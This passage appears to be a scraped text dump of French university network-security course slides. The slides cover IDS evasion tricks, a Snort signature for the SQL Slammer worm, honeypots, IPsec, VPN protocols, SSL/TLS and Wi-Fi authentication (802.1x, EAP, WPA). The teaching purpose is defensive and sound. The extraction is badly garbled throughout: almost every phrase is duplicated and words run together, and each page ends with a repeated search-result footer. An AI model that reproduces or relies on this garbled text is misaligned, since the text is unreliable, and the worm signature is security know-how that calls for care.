(//) ou à sens différent (\ à la place de /)(//) ou à sens différent (\ à la place de /) Chemins relatifs bidons (/bidule/../ ou /./)Chemins relatifs bidons (/bidule/../ ou /./) Découpage de requête ou camouflageDécoupage de requête ou camouflage Augmentation artificielle de la longueur d’URLAugmentation artificielle de la longueur d’URL URL véritable en paramètre de formulaire ou URL véritable en paramètre de formulaire ou

de scriptde script

Page 268: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

IDS : produitsIDS : produitsSnort (NIDS)Snort (NIDS)PreludePreludeRealsecure (ISS)Realsecure (ISS)Manhunt (Symantec)Manhunt (Symantec)CiscoCiscoEnterasys NetworksEnterasys NetworksNetwork AssociatesNetwork Associates……

Page 269: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Règles de signatures IDSRègles de signatures IDSTous les IDS savent importer les règles de détection de Tous les IDS savent importer les règles de détection de SnortSnortApprendre et comprendre leur format est donc un bon Apprendre et comprendre leur format est donc un bon investissementinvestissementhttp://www.snort.org/docs/snort_manual/node14.htmlhttp://www.snort.org/docs/snort_manual/node14.html Exemple : SQL Slammer (Exemple : SQL Slammer (http://www.winnetmag.com/Articles/Print.cfm?ArticleID=3http://www.winnetmag.com/Articles/Print.cfm?ArticleID=393609360) )

alert udp $EXTERNAL_NET any -> $HOME_NET 1434 alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Worm propagation attempt"; (msg:"MS-SQL Worm propagation attempt"; content:"|04|"; depth:1; content:"|81 F1 03 01 content:"|04|"; depth:1; content:"|81 F1 03 01 04 9B 81 F1 01|"; content:"sock"; 04 9B 81 F1 01|"; content:"sock"; content:"send"; reference:bugtraq,5310; content:"send"; reference:bugtraq,5310; classtype:misc-attack; reference:bugtraq,5311; classtype:misc-attack; reference:bugtraq,5311; reference:url,vil.nai.com/vil/content/v_99992.hreference:url,vil.nai.com/vil/content/v_99992.htm; sid:2003; rev:2;)tm; sid:2003; rev:2;)

Page 270: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Normalisation des IDS / attaquesNormalisation des IDS / attaquesSystèmes de corrélation et de gestion des Systèmes de corrélation et de gestion des intrusionsintrusions Besoin d’agglomérer et de filtrer différentes Besoin d’agglomérer et de filtrer différentes

sourcessources Nécessité d’avoir un format normaliséNécessité d’avoir un format normalisé Travaux en cours sur le sujetTravaux en cours sur le sujet

IDMEF pour la normalisation des messagesIDMEF pour la normalisation des messagesIDXP pour l’échange des messagesIDXP pour l’échange des messages

Page 271: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Les pots de mielLes pots de mielObjectif : détecter les intrusions à l’aide de machines Objectif : détecter les intrusions à l’aide de machines et/ou réseaux leurres non sécurisés et surveilléset/ou réseaux leurres non sécurisés et surveillésPrincipe du Principe du low hanging fruitlow hanging fruit

L’attaquant recherche souvent des cibles faciles à attaquerL’attaquant recherche souvent des cibles faciles à attaquer On lui en propose afin de On lui en propose afin de

1.1. Détecter sa présenceDétecter sa présence2.2. Lui faire perdre du tempsLui faire perdre du temps

Le pot de miel peut être soit une machine, soit tout un Le pot de miel peut être soit une machine, soit tout un réseau, souvent entièrement émulé ou faisant appel à réseau, souvent entièrement émulé ou faisant appel à des machines virtuelles (cf honeynet)des machines virtuelles (cf honeynet)Permet de détecter de nouvelles attaques et de Permet de détecter de nouvelles attaques et de comprendre la façon d’opérer de l’attaquantcomprendre la façon d’opérer de l’attaquant

Page 272: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Module 3Module 3Sécurité des réseauxSécurité des réseaux

3D – Protocoles3D – Protocoles

Page 273: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

IPsecIPsecComme son nom l’indique travail au niveau Comme son nom l’indique travail au niveau réseau (couche 3) et permet d’établir un canal réseau (couche 3) et permet d’établir un canal sécurisé pour échanger de manière protégée sécurisé pour échanger de manière protégée des données entre deux périphériques des données entre deux périphériques (machines, routeurs, …)(machines, routeurs, …)Mode tunnelMode tunnel Sécurisation du trafic entre 2 réseaux (de routeur à Sécurisation du trafic entre 2 réseaux (de routeur à

routeur)routeur) Protection de l’entête et de la chargeProtection de l’entête et de la chargeMode transportMode transport Sécurisation du trafic entre 2 machines (de PC à PC Sécurisation du trafic entre 2 machines (de PC à PC

en passant par des routeurs)en passant par des routeurs) Protection de la charge seulementProtection de la charge seulement

Page 274: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

IPsecIPsecAH (IP Authentication Header)AH (IP Authentication Header) RFC 2402RFC 2402 Intégrité des données et de l’adresse sans Intégrité des données et de l’adresse sans

chiffrementchiffrement

ESP (IP Encapsulating Security Payload)ESP (IP Encapsulating Security Payload) RFC 2406RFC 2406 Intégrité et chiffrement des donnéesIntégrité et chiffrement des données

On utilise soit AH seul, soit ESP seul, soit On utilise soit AH seul, soit ESP seul, soit AH et ESPAH et ESP

Page 275: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

IPsecIPsecProtocole IKE (Protocole IKE (Internet Key ExchangeInternet Key Exchange)) RFC 2409RFC 2409 En fait, 3 sous protocolesEn fait, 3 sous protocoles

ISAKMP (ISAKMP (Internet Security Association Key Internet Security Association Key Management ProtocolManagement Protocol))OakleySKEMESKEME

Négocie la méthode de sécurité qui sera Négocie la méthode de sécurité qui sera employée et fait l’échange de cléemployée et fait l’échange de clé

Page 276: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

IPsecIPsecSecurity Association Security Association (SA)(SA) A chaque conversation protégée est associée une SA A chaque conversation protégée est associée une SA

qui est un enregistrement de la configuration qui est un enregistrement de la configuration nécessaire au périphérique pour une connexion IPsec nécessaire au périphérique pour une connexion IPsec donnée (liste les algorithmes utilisés, les clés donnée (liste les algorithmes utilisés, les clés d’authentification et de chiffrement, la durée de d’authentification et de chiffrement, la durée de validité des clés, le mode tunnel ou transport, adresse validité des clés, le mode tunnel ou transport, adresse de destination, numéros de séquence)de destination, numéros de séquence)

Une SA est négociée pour chaque flux unidirectionnelUne SA est négociée pour chaque flux unidirectionnelSecurity Parameter IndexSecurity Parameter Index (SPI) (SPI) Les SA sont identifiées par un index (SPI)Les SA sont identifiées par un index (SPI) La source indique valeur du SPI est dans l’entête du La source indique valeur du SPI est dans l’entête du

paquet IPsecpaquet IPsec

Page 277: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Processus de sécurité IPsecProcessus de sécurité IPsecUn périphérique demande une connexion IPsec Un périphérique demande une connexion IPsec à un autre périphériqueà un autre périphériqueUne politique de sécurité (IPsec policy) a été Une politique de sécurité (IPsec policy) a été définie, ensemble de règles qui déterminent définie, ensemble de règles qui déterminent quelles actions à entreprendre (autoriser, quelles actions à entreprendre (autoriser, refuser, sécuriser) pour quels paquetsrefuser, sécuriser) pour quels paquetsUne négociation a lieu pour déterminer les clés Une négociation a lieu pour déterminer les clés et les algorithmeset les algorithmesUne association de sécurité (SA) est établie par Une association de sécurité (SA) est établie par chaque périphérique pour chaque direction de la chaque périphérique pour chaque direction de la connexion (entrante et sortante)connexion (entrante et sortante)

Page 278: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

IPsecIPsecProblème : NAT et AHProblème : NAT et AH

Page 279: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

VPN (VPN (Virtual Private NetworkVirtual Private Network))Un Réseau Privé Virtuel (RPV ou VPN) est une Un Réseau Privé Virtuel (RPV ou VPN) est une connexion privée sécurisée (tuyau chiffrant) connexion privée sécurisée (tuyau chiffrant) établie sur un réseau publicétablie sur un réseau publicProtocoles utilisés : PPTP, L2TP/IPsecProtocoles utilisés : PPTP, L2TP/IPsecUn tunnel est un chemin virtuel qui transporte Un tunnel est un chemin virtuel qui transporte des paquets encapsulés (et éventuellement des paquets encapsulés (et éventuellement chiffrés)chiffrés)Utilisé pour étendre un réseau contrôlé à travers Utilisé pour étendre un réseau contrôlé à travers un réseau publicun réseau public Interconnexion de sites distants (site centrale et Interconnexion de sites distants (site centrale et

succursale par exemple)succursale par exemple) Connexion d’un portable au réseau d’entreprise lors Connexion d’un portable au réseau d’entreprise lors

d’un déplacementd’un déplacement

Page 280: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

PPPPPPPoint to Point ProtocolPoint to Point ProtocolConnexion modem (à un serveur RAS – Connexion modem (à un serveur RAS – Remote Access ServerRemote Access Server))

PPPPPP IPIP TCPTCP donnéesdonnées

Page 281: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

PPTPPPTPStandard Standard de factode facto (protocole Microsoft) (protocole Microsoft)Les données de l’utilisateur encapsulées dans Les données de l’utilisateur encapsulées dans PPP, sont elles-mêmes encapsulées dans PPTP PPP, sont elles-mêmes encapsulées dans PPTP avec un entête GRE (avec un entête GRE (Generic Routing Generic Routing EncapsulationEncapsulation) et un entête IP) et un entête IPLa charge PPP est chiffrée en utilisant La charge PPP est chiffrée en utilisant Microsoft Microsoft Point-to-Point EncryptionPoint-to-Point Encryption (MPPE) avec MS- (MPPE) avec MS-CHAP ou EAP-TLSCHAP ou EAP-TLSAvant l’établissement du tunnel, négociation sur Avant l’établissement du tunnel, négociation sur TCP 1723TCP 1723Inconvénient : ne fonctionne que sur des Inconvénient : ne fonctionne que sur des réseaux IPréseaux IP

IPIP GREGRE PPPPPP IPIP TCPTCP donnéesdonnées

Page 282: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

L2TPL2TPMême service que PPTP mais sur des Même service que PPTP mais sur des réseaux IP ou non réseaux IP ou non Meilleure sécurité que PPTP quand il est Meilleure sécurité que PPTP quand il est utilisé avec IPsecutilisé avec IPsecAttention : L2TP ne fournit pas de Attention : L2TP ne fournit pas de chiffrement ni d’authentification (d’où chiffrement ni d’authentification (d’où IPsec)IPsec)La trame PPP est encapsulée avec un La trame PPP est encapsulée avec un entête L2TP et un entête UDPentête L2TP et un entête UDPL2TP supporte RADIUS (et TACACS+)L2TP supporte RADIUS (et TACACS+)

IPIP UDPUDP L2TPL2TP PPPPPP IPIP TCPTCP donnéesdonnées

Page 283: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

AuthentificationAuthentificationPAP : non sécurisé (envoi du mot de PAP : non sécurisé (envoi du mot de passe en clair !!!)passe en clair !!!)CHAP (CHAP (Challenge Handshake Challenge Handshake Authentication ProtocolAuthentication Protocol) : ) : challenge/responsechallenge/responseEAP (EAP (Extensible Authentication ProtocolExtensible Authentication Protocol)) Permet le support de multiples méthodes Permet le support de multiples méthodes

d’authentificationd’authentification

Page 284: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

SSL/TLSSSL/TLSA l’origine, SSL est un standard développé par A l’origine, SSL est un standard développé par Netscape pour sécuriser les transactions de e-Netscape pour sécuriser les transactions de e-commerce sur le Web (cf httpcommerce sur le Web (cf httpss))ProposePropose Authentification (chiffrement asymétrique)Authentification (chiffrement asymétrique) Confidentialité (chiffrement symétrique)Confidentialité (chiffrement symétrique) Intégrité (MAC)Intégrité (MAC)

Normalisé par l’IETF : TLS (Normalisé par l’IETF : TLS (Transport Layer Transport Layer SecuritySecurity))Se situe entre TCP et l’application (considéré Se situe entre TCP et l’application (considéré comme au niveau Transport)comme au niveau Transport)

Page 285: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Poignée de main SSLPoignée de main SSLC>S : ClientHelloC>S : ClientHello Envoi du client au serveur de Envoi du client au serveur de

La version de SSL supportéeLa version de SSL supportéeLa liste des algorithmes supportés par ordre de préférenceLa liste des algorithmes supportés par ordre de préférenceDes données aléatoires (nonce)Des données aléatoires (nonce)

S>C : ServerHello / Certificate / S>C : ServerHello / Certificate / ServerKeyExchange / CertificateExchangeServerKeyExchange / CertificateExchange Envoi du serveur au client de Envoi du serveur au client de

son certificat X509son certificat X509l’algorithme retenu l’algorithme retenu de données aléatoires (nonce)de données aléatoires (nonce)et éventuellement d’une demande de certificatet éventuellement d’une demande de certificat

Page 286: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Poignée de main SSLPoignée de main SSLC>S : Certificate / ClientKeyExchange / Certificate C>S : Certificate / ClientKeyExchange / Certificate VerificationVerification

Client vérifie certificat du serveur (intégrité, validité, révocation)Client vérifie certificat du serveur (intégrité, validité, révocation) Client génère le matériau de clé maître (Client génère le matériau de clé maître (PreMasterSecretPreMasterSecret) et la ) et la

chiffre avec la clé publique du serveurchiffre avec la clé publique du serveur Envoi du client au serveur de son certificat (si le serveur le lui a Envoi du client au serveur de son certificat (si le serveur le lui a

demandé), et un message signé avec sa clé privéedemandé), et un message signé avec sa clé privée

S>C : ChangeCipherSpecS>C : ChangeCipherSpec Le serveur trouve le matériau de clé maître grâce à sa clé privéeLe serveur trouve le matériau de clé maître grâce à sa clé privée Il en déduit la clé maître (le client fait de même)Il en déduit la clé maître (le client fait de même)

C<>S : FinishedC<>S : Finished le client et le serveur utilisent la clé maître pour générer les clés le client et le serveur utilisent la clé maître pour générer les clés

de sessionde session Ils s’échangent des messages indiquant que la poignée de main Ils s’échangent des messages indiquant que la poignée de main

est terminéeest terminée

Page 287: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

SSHSSHSecure ShellSecure Shell (SSH) fonctionne comme un (SSH) fonctionne comme un tunnel qui offre un accès de type terminal tunnel qui offre un accès de type terminal à une machine distanteà une machine distanteFournit authentification et transmission Fournit authentification et transmission sécurisée, en particulier pour des sécurisée, en particulier pour des programmes comme telnet, ftp, rlogin, programmes comme telnet, ftp, rlogin, rexec, rsh…rexec, rsh…

Autre tunnel, SSL : Autre tunnel, SSL : stunnelstunnel

Page 288: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Module 3Module 3Sécurité des réseauxSécurité des réseaux

3E - Quarantaine3E - Quarantaine

Page 289: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Quarantaine des accès distantsQuarantaine des accès distantsObjectif : vérifier la conformité d’une machine Objectif : vérifier la conformité d’une machine avant de lui accorder la connexion à distanceavant de lui accorder la connexion à distance Serveur RAS utilisant un serveur RADIUS avec des Serveur RAS utilisant un serveur RADIUS avec des

VSA (Vendor Specific Attributes)VSA (Vendor Specific Attributes)Script de conformitéScript de conformitéTemps accordé pour obtenir une réponse (avant passage en Temps accordé pour obtenir une réponse (avant passage en quarantaine ou déconnexion)quarantaine ou déconnexion)

Un Un listener listener sur le serveur RASsur le serveur RAS Un Un notifier notifier sur le clientsur le client Un script qui descend sur le client et invoque le Un script qui descend sur le client et invoque le

notifiernotifier pour prévenir le pour prévenir le listenerlistenerProblème : peut être contourné par un utilisateur Problème : peut être contourné par un utilisateur malveillant (ayant un minimum de compétences)malveillant (ayant un minimum de compétences)

Page 290: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

LAN (NAP / NAC)LAN (NAP / NAC)Application du principe de quarantaine au Application du principe de quarantaine au réseau local (CISCO/Microsoft)réseau local (CISCO/Microsoft)Couches 2 et 3 (802.1x, DHCP)Couches 2 et 3 (802.1x, DHCP)Obliger toutes les machines à participer Obliger toutes les machines à participer (pas de moyen de contourner la (pas de moyen de contourner la vérification de la conformité)vérification de la conformité)S’appuie sur des équipements réseau S’appuie sur des équipements réseau compatibles, serveurs RADIUS, serveurs compatibles, serveurs RADIUS, serveurs de politique de sécurité (vérifiant un des de politique de sécurité (vérifiant un des éléments de la santé de la machine)éléments de la santé de la machine)

Page 291: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Module 3Module 3Sécurité des réseauxSécurité des réseaux

3F - Wi-Fi3F - Wi-Fi

Page 292: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Sécurité du Wi-FiSécurité du Wi-FiDoit être prise en compte carDoit être prise en compte car Par défaut aucune sécuritéPar défaut aucune sécurité Protocoles anciens faiblesProtocoles anciens faibles Risque de points d’accès piratesRisque de points d’accès pirates

Page 293: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Sécurité du Wi-FiSécurité du Wi-FiLes options de sécurité possiblesLes options de sécurité possibles WEP (faible, à proscrire)WEP (faible, à proscrire)

WEP = Authentification et chiffrementWEP = Authentification et chiffrementImplémentation faible de l’algorithme RC4Implémentation faible de l’algorithme RC4Le nombre de vecteurs d’initialisation (IV) est limitéLe nombre de vecteurs d’initialisation (IV) est limitéLes checksums ne sont pas chiffréesLes checksums ne sont pas chiffréesAuthentification limitéeAuthentification limitée……Outils bien connus et répandusOutils bien connus et répandus

Page 294: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Sécurité du Wi-FiSécurité du Wi-FiLes options de sécurité possiblesLes options de sécurité possibles VPNVPN

Non transparent pour le clientNon transparent pour le clientLe serveur VPN est un goulot d’étranglementLe serveur VPN est un goulot d’étranglement

IPsecIPsecAuthentification machine seulement (pas Authentification machine seulement (pas d’authentification utilisateur)d’authentification utilisateur)Complexe à mettre en œuvreComplexe à mettre en œuvre

802.1x, EAP-TLS, PEAP (pour les 802.1x, EAP-TLS, PEAP (pour les équipements de type WEP)équipements de type WEP)

WPA (équipements transitoires plus récents)WPA (équipements transitoires plus récents) WPA2 (=802.11i) : standardWPA2 (=802.11i) : standard

Page 295: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

HistoriqueHistorique1999 - 802.11 d’origine1999 - 802.11 d’origine

Authentification 802.11 nativeAuthentification 802.11 native Chiffrement WEP statiqueChiffrement WEP statique

2001 - 2001 - 802.1x avec WEP802.1x avec WEP Authentification 802.1xAuthentification 802.1x Gestion des clés 802.1xGestion des clés 802.1x Protection des données dynamiqueProtection des données dynamique

2003 - 2003 - WPAWPA Authentification 802.1xAuthentification 802.1x Gestion des clés 802.1x amélioréeGestion des clés 802.1x améliorée Protection des données TKIPProtection des données TKIP

2004 - 2004 - 802.11i (WPA2)802.11i (WPA2) Authentification 802.1xAuthentification 802.1x Gestion des clés 802.1x amélioréeGestion des clés 802.1x améliorée Protection des données AESProtection des données AES Pré-authentificationPré-authentification

Page 296: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

802.1x802.1xIEEE 802.1x (2001)IEEE 802.1x (2001)Port-based Network Access ControlPort-based Network Access ControlProtocole indépendant du support physique (Ethernet, Protocole indépendant du support physique (Ethernet, Wi-Fi)Wi-Fi)Nécessite un point d’accès (AP) compatible 802.1xNécessite un point d’accès (AP) compatible 802.1xPas de contrainte sur les cartes réseau sans filPas de contrainte sur les cartes réseau sans filAuthentification avec EAPAuthentification avec EAP

Extensible Authentication Protocol – IETFExtensible Authentication Protocol – IETF Choix du protocole d’authentification (méthode EAP)Choix du protocole d’authentification (méthode EAP) L’AP ne s’occupe pas des méthodes EAPL’AP ne s’occupe pas des méthodes EAP

Autorisations avec RADIUSAutorisations avec RADIUSChiffrement du trafic :Chiffrement du trafic :

Gestion dynamique des clés 802.11 WEPGestion dynamique des clés 802.11 WEP

Page 297: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

802.1x – Vocabulaire802.1x – Vocabulaire

SupplicantAuthentificateur Serveur

d’authentification

Port AuthenticationEntity (PAE)

Page 298: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

802.1x802.1xPort contrôlé et port non contrôléPort contrôlé et port non contrôlé

IEEE 802.1x

DistributionSystem

Port non contrôlé

Port contrôlé

Client Wi-Fi

Page 299: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

RADIUS –Remote Authentication Dial-In User ServiceRADIUS –Remote Authentication Dial-In User ServiceAAA – Authentification, Autorisations, AccountingAAA – Authentification, Autorisations, Accounting

Serveur de modem

Serveur VPN

Point d’accèssans fil

Serveur RADIUS

Proxy RADIUS

Base de comptes d’utilisateurs

Clients

Serveurs d’accès

Protocole RADIUS

Clients RADIUS=

Page 300: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

EAPEAPExtension de PPP pour des mécanismes Extension de PPP pour des mécanismes arbitraires d’authentification d’accès arbitraires d’authentification d’accès réseauréseauPlug-in d’authentification sur le client et le Plug-in d’authentification sur le client et le serveur RADIUSserveur RADIUS

Client Wi-Fi Point d’accèsServeur RADIUS

Messages EAP

Dialogue EAP

Messages RADIUS

Page 301: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

802.11 association802.11 association

EAPOL-startEAPOL-start

EAP-request/identityEAP-request/identity

EAP-response/identityEAP-response/identity RADIUS-access-request (EAP)RADIUS-access-request (EAP)

EAP-requestEAP-request RADIUS-access-challenge RADIUS-access-challenge (EAP)(EAP)

EAP-response (credentials)EAP-response (credentials) RADIUS-access-request (EAP)RADIUS-access-request (EAP)

EAP-successEAP-success RADIUS-access-accept (EAP)RADIUS-access-accept (EAP)

EAPOW-key (WEP)EAPOW-key (WEP)

Access blockedAccess blocked

Access allowedAccess allowed

AuthentificationAuthentificationClient

supplicantPoint d’accèsauthenticator

RADIUSauthentication

server

Page 302: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Clés de chiffrementClés de chiffrementLe client et le serveur RADIUS génèrent des Le client et le serveur RADIUS génèrent des clés de session WEP par utilisateurclés de session WEP par utilisateur Jamais transmises dans l’airJamais transmises dans l’air RADIUS envoie la clé à l’AP, chiffrée avec le secret RADIUS envoie la clé à l’AP, chiffrée avec le secret

partagépartagéLe point d’accès a une clé WEP globaleLe point d’accès a une clé WEP globale Utilisée pendant l’authentification de l’AP au clientUtilisée pendant l’authentification de l’AP au client Envoyée dans un message EAPOW-keyEnvoyée dans un message EAPOW-key Chiffrée avec la clé de sessionChiffrée avec la clé de sessionLes clés de session sont re-générées quand…Les clés de session sont re-générées quand… Durée de vie expirée (60 minutes par défaut)Durée de vie expirée (60 minutes par défaut) Le client se déplace vers un nouvel APLe client se déplace vers un nouvel AP

Page 303: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Architecture EAPArchitecture EAP

Méthode

EAP

Media

EAP

MS

CHAP

v2

TLS

Secu

rID

PPP 802.3 802.5 802.11 …

TLS GSS_API

Kerberos

PEAP IKE MD5

Page 304: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Méthodes EAPMéthodes EAPEAP-MD5EAP-MD5

Utilise CHAP pour authentifier l’utilisateurUtilise CHAP pour authentifier l’utilisateur Déconseillé pour le Wi-Fi : Déconseillé pour le Wi-Fi : hasheshashes transmis en clair, pas transmis en clair, pas

d’authentification mutuelled’authentification mutuelleEAP-TLSEAP-TLS

Certificats machine et/ou utilisateur : nécessite une PKICertificats machine et/ou utilisateur : nécessite une PKI Détermination des clés 802.11Détermination des clés 802.11

PEAP (PEAP (Protected EAPProtected EAP) :) : Tunnel TLS pour protéger le protocole d’authentification, même Tunnel TLS pour protéger le protocole d’authentification, même

faible (MS CHAP v2)faible (MS CHAP v2) Certificat Serveur uniquementCertificat Serveur uniquement Nécessite Windows XP SP1 et IAS de Windows Server 2003Nécessite Windows XP SP1 et IAS de Windows Server 2003 Détermination des clés 802.11Détermination des clés 802.11

Page 305: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

PEAPPEAPMicrosoft, Cisco, RSAMicrosoft, Cisco, RSA

1.1. Crée un tunnel TLS avec le certificat du Crée un tunnel TLS avec le certificat du serveur RADIUS uniquementserveur RADIUS uniquement

2.2. Authentifie le client dans ce tunnelAuthentifie le client dans ce tunnel Le protocole d’authentification est Le protocole d’authentification est

protégéprotégé

TLSTLS EAPEAPAuthentificationAuthentification

CertificatServeur

EAP RADIUS-EAP

Page 306: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

PEAPPEAPPEAP-EAP-MS-CHAP v2PEAP-EAP-MS-CHAP v2 MS-CHAP v2 utilise un mot de passe MS-CHAP v2 utilise un mot de passe

(utilisateur et/ou machine)(utilisateur et/ou machine) Pas de certificat clientPas de certificat client Solution si pas de PKISolution si pas de PKI

PEAP-EAP-TLSPEAP-EAP-TLS Nécessite un certificat client, donc une PKINécessite un certificat client, donc une PKI Protège l’identité du clientProtège l’identité du client Plus lent que EAP-TLSPlus lent que EAP-TLS

Page 307: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

802.1x : est-ce suffisant ?802.1x : est-ce suffisant ?NonNonIl résout :Il résout : La découverte des clésLa découverte des clés – changement fréquent et – changement fréquent et

clés distinctes par clientclés distinctes par client Les points d’accès pirates et attaques « man in the Les points d’accès pirates et attaques « man in the

middle »middle » – authentification mutuelle – authentification mutuelle Accès non autorisésAccès non autorisés – authentification des utilisateurs – authentification des utilisateurs

et des machineset des machines

Il ne résout pas :Il ne résout pas : SpoofingSpoofing de paquets et des désassociations – 801.1x de paquets et des désassociations – 801.1x

n’utilise pas de MIC à clén’utilise pas de MIC à clé

Page 308: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

WPAWPAWireless Protected AccessWireless Protected Access

Standard temporaire avant la ratification Standard temporaire avant la ratification de 802.11i de 802.11i Requis pour la certification Wi-Fi depuis le Requis pour la certification Wi-Fi depuis le 31/8/200331/8/2003Wi-Fi Protected AccessWi-Fi Protected Accesshttp://www.wi-fi.org/OpenSection/protected_access.asphttp://www.wi-fi.org/OpenSection/protected_access.asp

Overview of the WPA Wireless Security Overview of the WPA Wireless Security Update in Windows XPUpdate in Windows XPhttp://support.microsoft.com/?id=815485http://support.microsoft.com/?id=815485

Page 309: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

